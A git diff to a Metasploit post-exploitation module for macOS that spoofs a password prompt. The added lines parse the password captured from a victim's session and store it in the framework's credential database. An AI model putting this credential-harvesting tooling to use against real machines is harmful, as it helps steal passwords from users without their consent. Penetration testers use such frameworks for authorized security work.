diff --git a/modules/post/osx/gather/password_prompt_spoof.rb b/modules/post/osx/gather/password_prompt_spoof.rb
index 19d39944ed..20df23d2e8 100644
--- a/modules/post/osx/gather/password_prompt_spoof.rb
+++ b/modules/post/osx/gather/password_prompt_spoof.rb
@@ -106,6 +106,19 @@ class MetasploitModule < Msf::Post
       print_good("password file contents: #{password_data}")
       passf = store_loot("password", "text/plain", session, password_data, "passwd.pwd", "OSX Password")
       print_good("Password data stored as loot in: #{passf}")
+      pwd = password_data.split(':', 3)
+      pwd.shift() # date
+      pwd.shift() # username
+      create_credential({
+        workspace_id: myworkspace_id,
+        post_reference_name: self.refname,
+        private_data: pwd,
+        origin_type: :session,
+        session_id: session_db_id,
+        private_type: :password,
+        username: username
+        }
+      )
     else
       print_status("Timeout period expired before credentials were entered!")
     end